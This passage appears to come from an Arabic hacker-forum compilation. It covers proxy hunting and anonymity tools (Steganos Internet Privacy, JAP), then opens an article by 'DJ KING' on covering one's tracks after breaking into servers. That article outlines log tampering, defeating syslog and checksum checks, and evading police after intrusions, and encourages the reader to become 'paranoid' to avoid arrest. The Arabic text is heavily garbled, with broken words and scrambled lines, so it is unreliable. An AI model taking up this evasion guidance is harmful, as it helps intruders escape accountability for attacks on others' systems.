‫ﺘ ﺮك‬‫ﻗﻢﺑﺎرﺳﺎ ل ﺮﺳﺎﻟﺔﻓﺎ ﺿﯿﺔاﻟﻰ ﻫﺬااﻟﻌﻨﻮان وﺑﻌﺪﻫﺎ ﺳﻮ ف ﯾﺎﺗﻲﻟﻚ ردﻗﻢﺑﻌﻤ ﻞ رﺑﻠﻲﻟ ﺮﺳﺎﻟﺔ وﺳﻮ فﺗﺸ‬
‫ﻓﻲاﻟﻘﺎﺋﻤﺔ ‪.‬‬
‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬
‫‪-٣‬ﻫﻨﺎك ﻃ ﺮﯾﻘﺔا ﺧ ﺮىﻟﺠﻠﺐاﻟﺒ ﺮوﻛﺴﯿﺎ ت‬
‫ﺘﺨﺪامﺑ ﺮاﻣ ﺞاﻟﺒ ﺤﺚ ﻋﻦاﻟﺒ ﺮوﻛﺴﯿﺎ ت وﻣﻨﻬﺎ ‪ proxy hunter‬ﻮﺑ ﺮﻧﺎﻣ ﺞ وﻏﯿ ﺮﻫﺎ ‪<<<.‬ﺗﻨﺒﻪﻟﻦا ﺿﻊﻟﻜﻢ‬ ‫ﺎﺳ‬
‫ﺘﻢ ﻋﻠﯿﻜﻢاﻟﺒ ﺤﺚﻓﻲ>>>‪google‬‬ ‫اﻟﻮ ﺻﻠﺔﻟﻜﻦاﻧ‬
‫ﺘﻮ ﺣﺔ ﻮﯾﻌﻄﯿﻚﻫﯿﺎ‬ ‫ﻮﯾﻘﻮم ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞﻓﻲاﻟﺒ ﺤﺚ ﻋﻦاﻟﺒ ﺮوﻛﺴﯿﺎ تاﻟﻤﻔ‬
‫ﻗﻊ‪.‬‬‫ﻗﻊﻟﻜﻦ وا ﷲاﻧﻲ ﻧﺎﺳﯿﻬﺎﻟﻜﻦان ﺷﺎ ء ﺎ ﷲاﺟﯿﺐاﻟﻤﻮا‬ ‫ﺛﻠﺔ ‪/‬ﻋﻦ ﻃ ﺮﯾ ﻖﺑﻌ ﺾاﻟﻤﻮا‬ ‫ﻃ ﺮﯾﻘﺔﺛﺎ‬

‫ﺘﺨﻔﻲ واﻟﺒﻘﺎ ء ﻣﺠﻬﻮﻻ‬


‫ﺘﺨﺪامﺑﻌ ﺾاﻟﺒ ﺮاﻣ ﺞﻓﻲاﻟ‬ ‫‪-٢‬اﺳ‬
‫ﺘﺨﻔﻲ وﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ‪Steganos Internet‬‬‫ﻫﻨﺎكﺑ ﺮاﻣ ﺞ ﻋﺪة وﻛﺜﯿ ﺮةﻟﻜﻦﻫﻨﺎكﺑ ﺮﻧﺎﻣ ﺞ ﺟﯿﺪﻓﻲاﻟ‬
‫‪Privacy‬‬

‫ﻮﻇﯿﻔﺔاﻟﺒ ﺮﻧﺎﻣ ﺞ‪::‬‬

‫ﺘﻨﻜ ﺮهﻓﻼﯾﻤﻜﻨﻚﻷ ﺣﺪأن ﯾﻜﺸ ﻒ‬‫ﺘ ﺮﻧ ﺖﺑﻬﻮﯾﻪ ﻣﺠﻬﻮﻟﻪ وﺷﺨﺼﯿﻪ ﻣ‬ ‫ﺘﯿﺠﺎﻧﻮس ﯾﺴﻤﺢﻟﻚانﺗﺒ ﺤ ﺮﻓﻲاﻷﻧ‬ ‫ﺳ‬
‫ﻗﻢاﻷﯾﺒﻲاﻟ ﺤﻘﯿﻘﻲاﻟﺨﺎ صﺑﻚﻟﻜﻲ‬ ‫ﺘﻨﻜﯿ ﺮ وﺗﻐﯿﯿ ﺮ ر‬
‫ﺘﯿﺠﺎﻧﻮس ﯾﻘﻮمﺑ‬
‫ﺘﻚ وﯾﻌ ﺮ ف ﻣﺸﺨﺼﺎﺗﻚﻷنﺑ ﺮﻧﺎﻣ ﺞ ﺳ‬‫ﻫﻮﯾ‬
‫ﺘﺠﺎﻧﻮس ﻋﻠﻰ دوﻟﻪ‬‫ﺘﻌﻘﺐ ﻣﻦ وراﺋﻬﺎﻫﺎ‪.‬ﻓﻔﻲﻛ ﻞﺛﺎﻧﯿﻪ ﯾﻨﺴﺒﻚ ﺳ‬‫ﺘ ﺮك وراﺋﻚ ﻣﻌﻠﻮﻣﺎ تأو ﺧﻄﻮا ت ﯾﻤﻜﻦأنﺗ‬
‫ﻻﺗ‬

‫‪٤٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻢأ ﺧﻔﺎﺋﻚﺑﻜ ﻞ‬
‫ﻣﺒﻬﻤﻪ ﻏﯿ ﺮ ﺣﻘﯿﻘﻪ ﻣﺜﻼ )ﻓ ﺮﻧﺴﺎ ‪،‬ﻛﻮﺑﺎ‪،‬اﻟﻌ ﺮا ق ‪،‬ﻟﺒﻨﺎن‪ ،‬ﻣﺼ ﺮ‪ ،‬ﺎﻓ ﺮﯾﻘﺎاﻟﺠﻨﻮﺑﯿﻪ ( وﻫﻜﺬاﻟﻜﻲ ﯾ‬
‫ﺘﻚاﻟﺨﺎﺻﻪ‬ ‫ﺘﺠﺴ ﺲاﻟﻤﺨﺰﻧﻪﻓﻲ ﺣﺎﺳﺒ‬ ‫ﺘﯿﺠﺎﻧﻮس ﺣﺬ ف ﺧﻄﻮا تاﻟ‬ ‫ﺳﻬﻮﻟﻪ وﺑﺴﺎ ﻃﻪ‪ .‬وﻛﺬﻟﻚ ﻣﻦ ﻣﯿﺰا ت ﺳ‬
‫ﺘﺸﻐﯿ ﻞ ) ﺎﻟﻮﯾﻨﺪوز (‪ .‬وأﻣﻮرأ ﺧ ﺮى ﯾﺠﺪرﺑﻨﺎاﻻﺷﺎرهاﻟﻰﺑﻌ ﻀﻬﺎ ‪:‬‬ ‫ﺘ ﺮﻧ ﺖأو ﻧﻈﺎماﻟ‬‫ﺘﺼﻔﺢاﻷﻧ‬ ‫ﺑ‬

‫ﺘﻚ‪.‬‬
‫ﻗﻢ ﺎﻷﯾﺒﻲاﻟ ﺤﻘﯿﻘﻲاﻟﺨﺎ صﺑﻚﻟﻜﻲ ﻻﯾﻤﻜﻦﻛﺸﻔﻚ وﻣﻌ ﺮﻓﻪﻫﻮﯾ‬
‫‪-‬ﺗﻨﻜﯿ ﺮ وﺗﻐﯿﯿ ﺮ ر‬

‫ﺘﺸﻐﯿ ﻞ‪.‬‬
‫ﺘ ﺮﻧ ﺖ و ﺧﻄﻮا ت ﻧﻈﺎماﻟ‬
‫ﺘﺠﺴ ﺲ ﺎﻟﻨﺎﺗﺠﻪ ﻣﻦﺗﺼﻔﺢاﻷﻧ‬ ‫‪-‬ﻣﺴﺢ ﺧﻄﻮا تاﻟ‬
‫ﺘﺪﯾﺎ تﺑﻮاﺑﺔاﻟﻌ ﺮب‬ ‫ﻮﻏﯿ ﺮﻫﺎ ﻣﻦاﻟﻤﺰاﯾﺎﺗﺠﺪوﻧﻬﺎﻓﻲ ﺎﻟﺸ ﺮ حﻓﻲ ﻣﻨ‬
‫‪http://www .arabsgate.com/vb/showthread.php?threadid=215946‬‬

‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ‪JAP‬‬ ‫‪-٣‬اﺳ‬


‫ﺘﻮ ﺣﺔ وﻫﺬااﻟﺒ ﺮاﻣ ﺞاﻧﺎ ﻣﺠ ﺮﺑﺔ‬‫ﻗﻊ ﻣﻔ‬‫ﺘ ﺮﻧ ﺖﺑﺪونﺑ ﺮﻛﺴﻲﺗﻜﻮنﻛ ﻞ ﺎﻟﻤﻮا‬ ‫ﺘﺼﻔﺢاﻷﻧ‬ ‫ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ﯾﻘﻮمﺑﺠﻌﻠﻚﺗ‬
‫وﺷﻐﺎ ل ﻣﯿﻪ ﻣﯿﻪ<<< ﺧﻄﻮا ت ﻋﻤ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ>>>‬
‫ﺘ ﺮﻧ ﺖ ﺎﻛﺴﺒﻠﻮر‬‫ـﺑﻌﺪﺗﻨﺼﯿﺐاﻟﺒ ﺮﻧﺎﻣ ﺞﻗﻢﺑﺎﻟﺬﻫﺎباﻟﻰاﻧ‬ ‫ـ‬
‫ﺘ ﺮ ﺧﺼﺎﺋ ﺺ‪.‬‬ ‫ـا ﺿﻐﻂﺑﺎﻟﺰراﻟﯿﻤﯿﻦ وا ﺧ‬ ‫ـ‬
‫ﺘﺒﻮﯾﺐاﺗﺼﺎﻻ ت ﻮﻛﺄﻧﻚﺗ ﺮﯾﺪ و ﺿﻊﺑ ﺮوﻛﺴﻲ‪.‬‬ ‫ـا ﺿﻐﻂ ﻋﻠﻰاﻟ‬ ‫ـ‬
‫ﻗﻢ ‪١٢٧٫٠٫٠٫١‬‬ ‫ـ ﺿﻊﻓﻲ ﺧﺎﻧﺔاﻟﻤﻠﻘﻢ ﻫﺬااﻟ ﺮ‬ ‫ـ‬
‫ﻗﻢ ‪٤٠٠١‬‬ ‫ـ وﻓﻲ ﺧﺎﻧﺔاﻟﻤﻨﻔﺬﻗﻢﺑﻮ ﺿﻊ ﻫﺬااﻟ ﺮ‬ ‫ـ‬
‫ـﺑﻌﺪ ذﻟﻚا ﺿﻐﻂ ﻋﻠﻰ ﻣﻮاﻓ ﻖ واﯾ ﻀﺎ ﻣﻮاﻓ ﻖ‪.‬‬ ‫ـ‬
‫ـﺛﻢاذﻫﺐ وﺷﻐ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ و ﺿﻊ ﻋﻼﻣﺔ ﺻﺢ ﻋﻠﻰ ‪ Activate anonymous web access‬ﻮﺑﻌﺪﻫﺎ‬ ‫ـ‬
‫ﺳﻮ فﺗ ﺮااﻟﻤﺆﺷ ﺮ ﯾ ﺤﺪدﻟﻚاﻟﻘﻮةﻓﻲاﻹﺗﺼﺎ ل واﻟ ﻀﻐﻂ‬
‫ﻗﯿﺐ وﻻ ﺷﻲ ء ﺳﻮىا ﷲ ﻋﺰ وﺟ ﻞ‬ ‫ﺘ ﺮﻧ ﺖ وﺗﺼﻔﺢﺑﺪون ر‬ ‫ـﺑﻌﺪ ذﻟﻚاذﻫﺐ ﺎﻟﻰاﻷﻧ‬ ‫ـ‬
‫ﺘﺨﺪاﻣﻪﻓﯿﻤﺎ ﻻ ﯾ ﺮ ﺿﻲا ﷲ ﻋﺰ وﺟ ﻞ>>>>‬ ‫<<<<ﺎرﺟﻮا ﻋﺪماﺳ‬
‫‪http://anon.inf.tu-dresden.de/win/jap_swing/setup.exe‬‬

‫‪...‬‬

‫‪٤٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"اﲪﻲ ﻧﻔﺴﻚ وﻏﻄﻲ اﻓﻌﺎﻟﻚ "‬

‫‪$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪DJ KING :‬‬
‫‪$$$$$$$$$$$$$‬‬

‫ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﺳﯿﺠﻌﻠﻚﺗﺨﺎ ف ﻣﻦ ﺧﯿﺎﻟﻚ وﺗﻌﻤ ﻞاﻟ ﻒ ﺣﺴﺎبﻟﻈﻠﻚ ‪..‬ﻟﻜﻦاﻧﺸﺎﻟﻪ ﺳﯿﻜﻮن دﻓﻌﻪﻟﻼﻣﺎم وﻟﯿ ﺲ‬
‫ﺘ ﺮاﺟﻊ‬‫ﻻنﺗﺨﺎ ف وﺗ‬
‫ﺘﺒﻮا‬‫ﺘﺠﻨﺒﻪ داﺋﻤﺎ ‪..‬ﺑﻤﻌﻨﻰا ﺧ ﺮ ‪..‬ﻛ ﻞ ﻣﻦا ﺧﻮاﻧﻨﺎ واﺳﺎﺗﺬﺗﻨﺎ ﻣﻦﻛ‬ ‫ﺎﺳﻠﻮباﻟﻤﻮ ﺿﻮ ع ﻏ ﺮﯾﺐ ‪ ..‬و ﻋﺎدة ﻣﺎ ﻧ‬
‫ﻗﻊﻛﺎن ﻫﻤﻬﻢاﻟﻮ ﺣﯿﺪﻓﻲاﻟ ﺤﻤﺎﯾﻪ ﻫﻮ ﻣﺴﺢاﻟﻠﻮ ق ‪log‬‬ ‫ﺘ ﺮا ق ﺎﻟﺴﯿ ﺮﻓ ﺮا ت واﻟﻤﻮا‬ ‫دروﺳﺎ و ﺷ ﺮو ﺣﺎﻓﻲا ﺧ‬
‫ﺘﻬﺎ ء ﻣﻦ‬ ‫ﺘﺸﻔﻪﺑﻌﺪاﻻﻧ‬ ‫ﺘﻜ‬
‫ﺛ ﺮك ؟!!ﻫﺬا ﻣﺎ ﺳ‬ ‫ﺘﺒﻊا‬ ‫‪files ..‬ﻟﻜﻦ ﻫ ﻞ ﻫﺬا ﯾﺠﻌﻠﻚﻓﻲاﻣﺎنﺗﺎم ؟!ﻫ ﻞﻫﺬا ﺳﯿﻤﻨﻊﺗ‬
‫ﻗ ﺮا ءةاﻟﻤﻮ ﺿﻮ ع ‪..‬‬
‫************************‬
‫ﺘ ﺮﻓﺎ و‬‫ﺎذاﻛﻨ ﺖﺗﻈﻦاناﻟ ﺤﺼﻮ ل ﻋﻠﻰﺗ ﺮﺟﻤﺔاﻟﺜﻐ ﺮا ت ) ‪( exploites‬ﺑﺎﺳ ﺮ ع ﻣﺎ ﯾﻤﻜﻦ ﻫﻮ ﻣﺎ ﯾﺠﻌﻠﻚ ﻣ ﺤ‬
‫ﻗﻮ لﻟﻚ "اﻧﻚاﻧﺴﺎن ﺧﺎ ﻃﺊ واناﺳﻠﻮبﺗﻔﻜﯿ ﺮك ﻏﻠﻂ "‬ ‫ﺘﻄﻮراﻓﺎﺳﻤﺢﻟﻲﺑﺎنا‬ ‫ﻣ‬
‫ﺘﻢاﻟﻘﺒ ﺾ ﻋﻠﯿﻚاذا ﻫﺎﺟﻤ ﺖا ﺣﺪىاﻟﺴﯿ ﺮﻓ ﺮا تاﻟﻜﺒﯿ ﺮه ‪..‬‬ ‫ﺘﻔﯿﺪكاﻟﺜﻐ ﺮه ﺎﻟ ﺤﺪﯾﺜﻪ ﺟﺪا ) ‪day ) ٠‬ﻋﻨﺪﻣﺎ ﯾ‬ ‫ﻣﺎذا ﺳ‬
‫ﺘﻚ !؟!‬ ‫ﻗﺒ‬‫ﺘﻢاﻟﺴﯿﻄ ﺮه ﻋﻠﻰاﺟﻬﺰﺗﻚ وادواﺗﻚ و ﻣ ﺮا‬ ‫؟ ﻮ ﻋﻨﺪﻫﺎ ﺳﯿ‬
‫ﺘﻘﻨﯿﺎ تاﻟﻌﺎﻟﯿﻪ !!‬ ‫ﯾﻤﻜﻦ ﯾ ﺮىاﻟﺒﻌ ﺾان ﻫﺬاﻟﻢﺑ ﺤﺪ ثﻗﻂ ﻻي ﺷﺨ ﺺ ﻧﻌ ﺮﻓﻪ ؟اوانﺑﻼدﻧﺎﻟﯿ ﺲﻓﯿﻬﺎ ﻫﺬهاﻟ‬
‫ﻟﻜﻦ ﻫﺬاﻗﺪ ﯾ ﺤﺪ ث ﯾﻮم ﻣﺎ !!‬
‫ﻮاﯾ ﻀﺎاﻧ ﺖ ﻻﺗﻬﺎﺟﻢﻓﻘﻂ ﺳﯿ ﺮﻓ ﺮا تﺑﻠﺪكاﻧﻤﺎ ﺳﯿ ﺮﻓ ﺮا تا ﺧ ﺮى ﻋﺎﻟﻤﯿﻪ ﻣ ﺤﻤﯿﻪ ﻣﻦﻗﺒ ﻞاﻟﺸ ﺮ ﻃﻪاﻟﺪوﻟﯿﻪ ‪..‬ﻛﻤﺎ‬
‫اﻧﻪ ﻻﺑﺪ ﻣﻦاﻟ ﺤ ﺮ ص وﻓﻬﻢاﻻﻣﻮراذاﻛﻨ ﺖﺗ ﺮﯾﺪانﺗﺴﻤﻲ ﻧﻔﺴﻚ ﻫﻜ ﺮ ‪hacker‬ﺑﻤﻌﻨﻰاﻟﻜﻠﻤﻪ‬
‫ﺘ ﺮا فاواﻧﻚ‬ ‫ﺘﻘﺪﻓﻲ ﻧﻔﺴﻚاﻧﻚاﻛﺒ ﺮ ﻣﻦﻗ ﺮا ءةﻫﺬااﻟﻤﻮ ﺿﻮ عﺑﻜﺜﯿﯿ ﺮ ﻻﻧﻚ ﻣﻦاﻟﻤﻌ ﺮوﻓﯿﻦ ﻋﻨﻬﻢﺑﺎﻻ ﺣ‬ ‫ﺮﺑﻤﺎﺗﻌ‬
‫ﺘﺎجﻟﻘ ﺮا ءةاﻟﻤﻮ ﺿﻮ عاﻟﻲاﻟﻨﻬﺎﯾﻪ‬ ‫ﺗ ﺮى ذﻟﻚﻓﻲ ﻧﻔﺴﻚ ‪..‬ﻟﻜﻦاﻧﺎاؤﻛﺪﻟﻚﺑﺎﻧﻚ ﻣﺨﻄﺊ واﻧ ﺖﺗ ﺤ‬
‫************************‬
‫ﺎﻟﻤﻮ ﺿﻮ ع ﻣﻘﺴﻢاﻟﻰ ‪٨‬اﺟﺰا ء ‪:‬‬
‫=================‬
‫ﺘﻪ ﺣﺎﻟﯿﺎ (‬‫ﺘﻬﺎ ء ﻣﻦﻗ ﺮاﺋ‬ ‫ﻗﺪﻗﻤ ﺖاﻧ ﺖﺑﺎﻻﻧ‬ ‫ﺎﻟﺠﺰ ءاﻻو ل ‪:‬اﻟﻤﻘﺪﻣﻪ ) وﻫﻮ ﻣﺎ‬
‫ﺘﻢ ﻋ ﺮ ﺿﻪ ﻣﻦ ﺧﻼ ل ﻫﺬه‬ ‫ﺎﻟﺠﺰ ءاﻟﺜﺎﻧﻲ ‪:‬اﻻﻣﻮراﻟﻌﻘﻠﯿﻪ وﻛﯿ ﻒﺗﺼﺒﺢ " ‪**" Paranoid‬ﻫﺬا ﺎﻟﺠﺰ ء ﺳﯿ‬
‫اﻟﻤﻮا ﺿﯿﻊ ‪:‬‬
‫‪-‬ﺎﻟﺪاﻓﻊاواﻟ ﺤﺎﻓﺰ‬
‫‪-‬ﻟﻤﺎذاان ﻻﺑﺪانﺗﺼﺒﺢ " ‪" Paraniod‬‬
‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦانﺗﺼﺒﺢ " ‪ " Paranoid‬؟‬
‫ﺘﻚاﻟﺠﺪﯾﺪه ؟!‬ ‫‪-‬ﻮﻛﯿ ﻒﺗ ﺤﺎﻓﻆ ﻋﻠﻰاﺳﻠﻮﺑﻚاﻟﺠﺪﯾﺪاو ﺷﺨﺼﯿ‬

‫ﺘﻢﺗﻮ ﺿﯿﺢ ﻣﻌﻨﺎﻫﺎ و ﻣﻔﻬﻮﻣﻬﺎ ﻣﻊ ﺷ ﺮ ح ﻫﺬااﻟﺠﺰ ء‬


‫ﺘﺴﺎﺋ ﻞ ﻋﻦ ﻣﻌﻨﻰ ﻫﺬهاﻟﻜﻠﻤﻪ ‪ ..‬ﺳﯿ‬‫ﺘﺎﻛﺪان ﻣﻌﻈﻤﻜﻢ ﯾ‬ ‫**ﻣ‬
‫اﻧﺸﺎ ءا ﷲ‪.‬‬
‫ﺘﻢ ﻋ ﺮ ﺿﻬﺎ ﻣﻦ‬ ‫ﺘ ﺮا ق )ﻮ ﺳﯿ‬
‫ﺘﻬﺎﻗﺒ ﻞانﺗﻘﻮمﺑﺎي ﻋﻤﻠﯿﺔا ﺧ‬
‫ﺘﻲ ﯾﺠﺐ ﻋﻠﯿﻚ ﻣﻌ ﺮﻓ‬‫اﻟﺠﺰ ءاﻟﺜﺎﻟﺚ ‪:‬اﻻﺳﺎﺳﯿﺎ تاﻟ‬
‫ﺘﺎﻟﯿﻪ (‬
‫ﺧﻼ لاﻟﻨﻘﺎطاﻟ‬
‫‪-‬ﺗﻤﻬﯿﺪ‬
‫‪-‬ﺎﻣﻦ ﻧﻔﺴﻚ‬
‫‪ -‬ﺣﺴﺎﺑﻚ ﺎﻟﺨﺎ ص‬
‫‪-‬ﻣﻠﻔﺎ تاﻟﻠﻮ ق‪LoGs‬‬

‫‪٤٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺮكاياﺛ ﺮ‬ ‫‪-‬ﻻﺗ‬
‫‪-‬ﺎﻣﻮر واﺷﯿﺎ ء ﯾﺠﺐﺗﺠﻨﺒﻬﺎ و ﺎﻟ ﺤﻈ ﺮ ﻣﻨﻬﺎ‬
‫ﺘﺎﻟﯿﻪ (‬
‫ﺘﻢ ﻋ ﺮ ﺿﻪ ﻣﻦ ﺧﻼ لاﻟﻨﻘﺎطاﻟ‬
‫ﺘﻬﺎ ) و ﺳﯿ‬
‫ﺘﻲ ﯾﺠﺐ ﻣﻼ ﺣﻈ‬ ‫ﺘﻘﻨﯿﺎ تاﻟ ﺤﺪﯾﺜﻪاﻟﻲ ﯾ‬
‫ﺎﻟﺠﺰ ءاﻟ ﺮاﺑﻊ ‪:‬اﻟ‬
‫‪-‬ﺗﻤﻬﯿﺪ‬
‫ﺛ ﺮك ﻣﻦاي ﻧﻮ ع‬ ‫‪-‬ﺎﻣﻨﻊﺗﻘﻔﻰا‬
‫‪-‬ﺎﯾﺠﺎداي ﻧﻮ ع ﻣﻦاﻧﻮا ع ﻣﻠﻔﺎ تاﻟﻠﻮ ق ‪ lOGs‬ﻣﻬﻤﺎﻛﺎنﻓﯿﻬﺎ ﻣﻦﺗﻼﻋﺐ ‪..‬‬
‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ‪syslog configuration and logfile‬‬
‫ﺘﻪ‬ ‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ ﻧﻮﻋﯿﺎ تﺑ ﺮاﻣ ﺞاﻻﻣﻦاﻟﻤﺜﺒ‬
‫‪-‬ﺗ ﺤﻘ ﻖ ﻣﻦ وﺟﻮداﻟﻤﺪرا ء‪Admins‬‬
‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦﺗﺼ ﺤﯿﺢ ‪checksum checking software‬‬
‫ﺘﺨﺪماﻻﻣﻨﯿﻪ‬ ‫‪ -‬ﺣﯿ ﻞاﻟﻤﺴ‬

‫ﻗﺒﻪ‬‫ﺎﻟﺠﺰ ءاﻟﺨﺎﻣ ﺲ ‪ :‬ﻣﺎذاﺗﻔﻌ ﻞان و ﺿﻌ ﺖﺗ ﺤ ﺖاﻟﻤ ﺮا‬


‫ﺎﻟﺠﺰ ءاﻟﺴﺎدس ‪ :‬ﻣﺎاﻟﺬي ﻋﻠﯿﻚاﻟﻘﯿﺎمﺑﻪ واﯾ ﻀﺎاﻟﺬي ﻻﺑﺪ ﻣﻦ ﻋﺪماﻟﻘﯿﺎمﺑﻪﻓﻲ ﺣﺎﻟﺔاﻧﻪﺗﻢاﻟﻘﺒ ﺾ ﻋﻠﯿﻚ‬
‫ﺘﺒﺎ ء‬
‫ﺘﺨﻔﻲ واﻻ ﺧ‬ ‫ﺎﻟﺠﺰ ءاﻟﺴﺎﺑﻊ ‪:‬ﻗﺎﺋﻤﻪﺑﺎﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞﻟﻠ‬
‫ﺘﺎﺑﻌﻮاﻟﻤﻮ ﺿﻮ عﺑ ﺤ ﺮ ض وﺗ ﺮﻛﯿﺰ ﺷﺪﯾﺪن ﻣﻦاﻻن ‪!!! ...‬‬ ‫ﺘﺎﻣﯿﻪ ‪........‬ارﺟﻮانﺗ‬ ‫ﺎﻟﺠﺰ ءاﻟﺜﺎﻣﻦ ‪:‬ﻛﻠﻤﻪ ﺧ‬

‫***************************************************************************************‬
‫اﻟﺠﺰاﻟﺜﺎﻧﻲ ‪:‬‬
‫=======‬
‫‪-‬ﺎﻟﺪاﻓﻊ واﻟ ﺤﺎﻓﺰ ‪:‬‬
‫*************‬
‫ﻗﻌﻲ ‪..‬‬ ‫ﺘﺼﺒﺢاﻧﺴﺎن وا‬ ‫ﺘﺪﻓﻌﻚ وﺗ ﺤﻔﺰكﻟ‬ ‫ﺘﻲ ﺳ‬ ‫ﻻﺑﺪ ﻣﻦﺗ ﺤﻜﯿﻢاﻟﻌﻘ ﻞﻟﻠﻨﺠﺎ حﻓﻲاي ﻋﻤ ﻞ ‪..‬اﻟﻌﻘ ﻞ ﻫﻮاﻟﻘﻮهاﻟ‬
‫ﻣﺴﺌﻮ ل و ﺣ ﺮﯾ ﺺ‬
‫ﺘﻮﻓ ﺮﻓﯿﻪ ﻫﺬهاﻟﻤﺒﺎدى ء و ﺎﻻﻣﻜﺎﻧﯿﺎ تاﻟﻌﻘﻠﯿﻪ ‪ ..‬ﻣﺜﻠﻬﺎ ﻣﺜ ﻞﺑﻨﺎ ء‬‫ﺘ ﺮ ق ) ‪ ( Hacker‬ﺎﻟﻨﺎﺟﺢ ﻻﺑﺪ وانﺗ‬ ‫ﺎﻟﻤﺨ‬
‫ﺘﻘﺴﻢاﻻﺑﻌﺪ ﻣﻤﺎرﺳﺔاﻟ ﺮﯾﺎ ﺿﻪاﻟﺨﺎﺻﻪﺑﺬﻟﻚ ) ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل (‬ ‫ﻋ ﻀﻼ تاﻟﺠﺴﻢﻟﻦ ﯾﻜﺒ ﺮاﻟﺠﺴﻢ و ﯾ‬
‫ﺘﯿﺎ ﻃﺎ ت واﻟ ﺤﺬرﻗﺒ ﻞاﻟﻘﯿﺎمﺑﺎي ﺷﺊ‬ ‫ﺘﻤ ﺮساوﻟﺪﯾﻚاﻟﻜﺜﯿﯿ ﺮ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت ﻻﺑﺪا ﺧﺬاﺷﺪاﻻ ﺣ‬ ‫ﻣﻬﻤﺎﻛﻨ ﺖ ﻣ‬

‫‪-‬ﻟﻤﺎذا ﯾﺠﺐانﺗﺼﺒﺢ " ‪ " Paranoid‬؟‬


‫***************************‬
‫ﻛﻠﻤﺔ " " ‪Paranoia‬ﻓﻲاﻟﻠﻐﻪاﻻﻧﺠﻠﯿﺰﯾﻪﺗﻌﻨﻲ ﺟﻨﻮناﻻرﺗﯿﺎب ) ﻧﺰﻋﻪ ﻋﻨﺪاﻻﻓ ﺮادﺗﺠﻌﻠﻚﺗﺸﻚﻓﻲ ﺟﻤﯿﻊ‬
‫اﻻﻣﻮر و ﺟﻤﯿﻊاﻻﺷﺨﺎ ص (‬
‫ﺘ ﻀﺢﻟﻨﺎﺑﻌﺪ ﻣﻌ ﺮﻓﺔا ﺻ ﻞﻫﺬهاﻟﻜﻠﻤﻪ ‪..‬‬ ‫ﺘﻘﺪاناﻻﻣﻮرﺑﺪا تﺗ‬ ‫ﺎﻋ‬
‫ﺘﺎﻟﯿﻪ ‪: paraniod‬ﺗﻌﻨﻲانﺗﺼﺒﺢ ﺷﺪﯾﺪاﻟ ﺤﺬر واﻟﺸﻚﻓﻲ‬ ‫ﯾﻤﻜﻦان ﻧﻠﺨ ﺾ ﻣﺎ ذﻛ ﺮ ﻣﻦ ﺧﻼ لاﻟﻜﻠﻤﺎ تاﻟ‬
‫ﺟﻤﯿﻊاﻟﻈ ﺮو ف‬
‫ﻟﻤﺎذا ﯾﺠﺐﺗﻮ ﺧﻲاﻟ ﺤﺬرﺑﻬﺬهاﻟﻄ ﺮﯾﻘﻪ ﺎﻟﻤﺨﯿﻔﻪ ؟!!‬
‫ﻗﻌﻚ داﺋﻤﺎاﻟﻰاﺳﻮ ءاﻟﻈ ﺮو ف ﯾﺠﻌﻠﻚﺗﺴﯿ ﺮﻓﻲاﻣﺎن ‪ ..‬و ﻻن ﻣﺎﺗﻔﻌﻠﻪ ﻫﻮ ﺷﺊﻛﺒﯿﯿ ﺮ ﺟﺪا ‪ ..‬ﻣﺎﺗ ﺮاه‬ ‫ﻻنﺗﻮ‬
‫ﺘ ﺤﻤﯿ ﻞﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮﻫﻮ ﺷﺊ‬ ‫اﻧ ﺖﺑﻌﯿﻨﻚاﻟﻤﺠ ﺮدهاﻧﻚﺗﻐﯿ ﺮاﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﻪ ‪ ..‬ﺎوﺗﻘﻮمﺑ‬
‫ﺑﺴﯿﻂﺑ ﻞ و ﺳﻬ ﻞ ﺟﺪا‬
‫ﺘ ﺮﻣﻰ‬ ‫ﺘﺒﻌﻚ واﻟﻘﺒ ﺾ ﻋﻠﯿﻚ ﻣﻦﻗﺒ ﻞاﻟﺸ ﺮ ﻃﻪ !؟! واﻧﻚ ﺳ‬ ‫ﻗ ﺖ ﺳﯿ ﺮﻓ ﺮ ﻣﻌﯿﻦ وﺗﻢ ر ﺻﺪك وﺗ‬ ‫ﺘﺮ‬‫ﻣﺎذاﻟﻮاﻧﻚ ﺎ ﺧ‬
‫ﻗﯿﻦ واﻟﻤﺠ ﺮﻣﯿﻦ‬ ‫ﻓﻲاﻟﺴﺠﻦﻛﺎﻟﺴﺎر‬
‫ﺘﻤﺎمﺑﻤﺎ ﻣﺎﻗﺪ ﯾﺼﯿﺐاﻫﻠﻚ ‪..‬اﺑﻮك ‪...‬اﻣﻚ ‪..‬ا ﺧﻮﺗﻚ ‪..‬‬ ‫ﺘﻢﺑﻤﺎﻗﺪ ﯾ ﺤﺼ ﻞﻟﻚ ‪ ..‬ﻋﻠﯿﻚاﻻﻫ‬ ‫ﺎنﻛﻨ ﺖ ﻻﺗﻬ‬

‫‪٤٧‬‬
